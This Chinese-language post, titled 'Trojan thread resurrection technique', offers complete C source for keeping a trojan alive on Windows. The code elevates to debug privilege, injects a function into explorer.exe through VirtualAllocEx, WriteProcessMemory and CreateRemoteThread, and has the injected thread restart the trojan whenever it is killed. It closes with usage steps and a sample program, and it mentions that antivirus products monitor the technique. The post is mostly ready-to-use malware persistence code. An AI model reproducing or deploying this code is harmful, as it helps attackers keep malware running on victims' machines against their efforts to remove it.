木马的线程复活技术
远程线程插入技术,挺常见而实用的东西。
只是这个远程线程插入函数被很多杀软作为重点监视对象,所以不知道这东西以后还能用不。
///////////////////////
//NotDead.h
//////////////////////
#include <windows.h> #include <TLHELP32.H> TCHAR exepath[MAX_PATH]={0x00}; //参数结构 typedef struct _remotepara { DWORD pWaitForSingleObject; DWORD pOpenProcess; DWORD pWinExec; DWORD PID; HANDLE hProcess; char path[MAX_PATH]; }REMOTEPARA,*pREMOTEPARA; //开启本线程的Debug权限 bool EnableDebugPrivilege(const char *name) { HANDLE hToken; TOKEN_PRIVILEGES tp; if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken)) return false; if (!LookupPrivilegeValue(NULL,name,&tp.Privileges[0].Luid)) return false; tp.PrivilegeCount=1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (!AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL)) return false; return true; } //根据进程名获取PID DWORD GetProcessId(char *ProcessName) { PROCESSENTRY32 pe32; pe32.dwSize = sizeof(pe32); HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if (hProcessSnap==INVALID_HANDLE_VALUE) return 0; BOOL bProcess=Process32First(hProcessSnap,&pe32); while(bProcess) { if (strcmp(strlwr(pe32.szExeFile),strlwr(ProcessName))==0) return pe32.th32ProcessID; bProcess=Process32Next(hProcessSnap,&pe32); } CloseHandle(hProcessSnap); return 0; } //远程线程函数 DWORD WINAPI remote(LPVOID _rp) { REMOTEPARA *rp = (REMOTEPARA*)_rp; typedef UINT (WINAPI *XWinExec)(LPSTR,UINT); typedef HANDLE (WINAPI *XOpenProcess)(DWORD,BOOL,DWORD); typedef DWORD (WINAPI *XWaitForSingleObject)(HANDLE,DWORD); //获取自定义函数 XWaitForSingleObject MyWaitForSingleObject = (XWaitForSingleObject)rp->pWaitForSingleObject; XOpenProcess MyOpenProcess = (XOpenProcess)rp->pOpenProcess; XWinExec MyWinExec = (XWinExec)rp->pWinExec; //检测要保护的进程是否被关闭,是则重启进程。 rp->hProcess = MyOpenProcess(PROCESS_ALL_ACCESS,FALSE,rp->PID); MyWaitForSingleObject(rp->hProcess,INFINITE); MyWinExec(rp->path,SW_SHOW); return 0; } int NotDead() { //提权 if(!EnableDebugPrivilege(SE_DEBUG_NAME)) return 0; //获取保护和被保护进程PID DWORD ProctectPID,ProctectedPID; ProctectedPID=GetCurrentProcessId(); if ((ProctectPID=GetProcessId("explorer.exe")) == 0) return 0; //打开保护进程句柄 HANDLE hProtecte = OpenProcess(PROCESS_ALL_ACCESS,FALSE,ProctectPID); if (hProtecte==NULL) return 0; //在保护程序中申请空间,准备写入remote() HANDLE RemoteAddrFun; RemoteAddrFun = (PTSTR)VirtualAllocEx(hProtecte,NULL,1024*4,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); if (RemoteAddrFun==NULL) return 0; //写入remote() if (WriteProcessMemory(hProtecte,RemoteAddrFun,(LPVOID)remote,1024*4,NULL)==FALSE) return 0; //定义远程线程函数参数 REMOTEPARA rp; memset((char *)&rp,0x00,sizeof(rp)); GetModuleFileName(NULL,rp.path,260); rp.PID = ProctectedPID; HMODULE hkernel = GetModuleHandle("kernel32.dll"); rp.pOpenProcess = (DWORD)GetProcAddress(hkernel,"OpenProcess"); rp.pWinExec = (DWORD)GetProcAddress(hkernel,"WinExec"); rp.pWaitForSingleObject = (DWORD)GetProcAddress(hkernel,"WaitForSingleObject"); //在保护程序中申请空间,准备写入参数 HANDLE RemoteAddrPara; RemoteAddrPara = (PTSTR)VirtualAllocEx(hProtecte,NULL,sizeof(rp),MEM_COMMIT,PAGE_READWRITE); if (RemoteAddrPara==NULL) return 0; //写入参数 if (WriteProcessMemory(hProtecte,RemoteAddrPara,(LPVOID)&rp,sizeof(rp),NULL)==FALSE) return 0; //=================================== // 创建远程线程 //=================================== HANDLE hRemoteThread = CreateRemoteThread(hProtecte,NULL,0,(LPTHREAD_START_ROUTINE)RemoteAddrFun,(LPVOID)RemoteAddrPara,0,NULL); if (hRemoteThread==NULL) return 0; CloseHandle(hProtecte); return 1; }
使用方法:只需要在程序中调用NotDead()即可。
示例:
// X.cpp : Defines the entry point for the application. // #include "stdafx.h" #include "resource.h" #include "NotDead.h" INT CALLBACK DlgProc( HWND hwndDlg, // handle to dialog box UINT uMsg, // message WPARAM wParam, // first message parameter LPARAM lParam // second message parameter ) { switch(uMsg) { case WM_INITDIALOG: NotDead(); break; case WM_CLOSE: EndDialog(hwndDlg,0); break; } return 0; } int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { DialogBox(hInstance,MAKEINTRESOURCE(IDD_DIALOG1),NULL,DlgProc); return 0; }